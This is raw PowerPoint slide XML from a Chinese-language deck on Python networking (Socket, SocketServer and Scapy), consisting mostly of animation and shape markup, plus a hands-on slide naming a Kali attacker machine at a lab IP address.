                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="75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9" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="61" grpId="0"/>
      <p:bldP spid="62" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="64" grpId="0"/>
      <p:bldP spid="65" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="93" grpId="0"/>
      <p:bldP spid="97" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="98" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="99"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直线连接符 45"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="41" idx="6"/>
            <a:endCxn id="80" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4278443" y="4034657"/>
            <a:ext cx="975211" cy="468172"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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48" name="直线连接符 47"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="80" idx="5"/>
            <a:endCxn id="23" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6938347" y="4034657"/>
            <a:ext cx="638969" cy="388074"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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50" name="直线连接符 49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="7"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8446352" y="3353661"/>
            <a:ext cx="353623" cy="709103"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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52" name="直线连接符 51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="41" idx="1"/>
            <a:endCxn id="42" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2283103" y="3015665"/>
            <a:ext cx="870988" cy="1021442"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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7577316" y="3913661"/>
            <a:ext cx="1018139" cy="1018139"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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kumimoji="1" lang="en-US" altLang="zh-CN" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="椭圆 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8619356" y="2300935"/>
            <a:ext cx="1233345" cy="1233345"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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kumimoji="1" lang="en-US" altLang="zh-CN" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="8000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="椭圆 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2961183" y="3844199"/>
            <a:ext cx="1317260" cy="1317260"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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kumimoji="1" lang="en-US" altLang="zh-CN" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="8000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="组 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5111810" y="2205913"/>
            <a:ext cx="1968382" cy="1968382"/>
            <a:chOff x="4963924" y="2157786"/>
            <a:chExt cx="2120152" cy="2120152"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="椭圆 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4963924" y="2157786"/>
              <a:ext cx="2120152" cy="2120152"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="50000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="100000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="BFBFBF">
                    <a:alpha val="63922"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect t="100000" r="100000"/>
              </a:path>
              <a:tileRect l="-100000" b="-100000"/>
            </a:gradFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="571500" dist="508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13800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="文本框 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5261532" y="2594794"/>
              <a:ext cx="1524934" cy="1292879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr lvl="0" algn="ctr">
                <a:defRPr sz="8000">
                  <a:solidFill>
                    <a:srgbClr val="41AAD5"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                      <a:prstClr val="black">
                        <a:alpha val="50000"/>
                      </a:prstClr>
                    </a:innerShdw>
                  </a:effectLst>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>目录</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>CONTENT</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="文本框 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439670" y="5316220"/>
            <a:ext cx="2359025" cy="944880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SockServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="文本框 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2507615" y="2298065"/>
            <a:ext cx="2604135" cy="518160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="文本框 67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6743607" y="5090621"/>
            <a:ext cx="2685556" cy="518160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="文本框 68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9961933" y="2655997"/>
            <a:ext cx="2014773" cy="518160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>其他</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="椭圆 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371436" y="2103998"/>
            <a:ext cx="1068084" cy="1068084"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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kumimoji="1" lang="en-US" altLang="zh-CN" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="椭圆 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4904743" y="2001053"/>
            <a:ext cx="2382515" cy="2382515"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>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9600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="41AAD5"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>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9"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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="80"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="10" presetClass="entr" presetSubtype="0"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wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="22" presetClass="entr" presetSubtype="8" fill="hold"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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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25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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="after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down)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="22" presetClass="entr" presetSubtype="4"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="25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animBg="1"/>
      <p:bldP spid="41" grpId="0" animBg="1"/>
      <p:bldP spid="38" grpId="0"/>
      <p:bldP spid="59" grpId="0"/>
      <p:bldP spid="68" grpId="0"/>
      <p:bldP spid="69" grpId="0"/>
      <p:bldP spid="42" grpId="0" animBg="1"/>
      <p:bldP spid="8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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067052" y="330463"/>
            <a:ext cx="3100387" cy="701040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="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实战：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"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61" name="矩形 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307340" y="3939540"/>
            <a:ext cx="4349115" cy="1078230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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攻击方：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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10.10.10.134</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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mac</a:t>
            </a:r>
            <a:r>
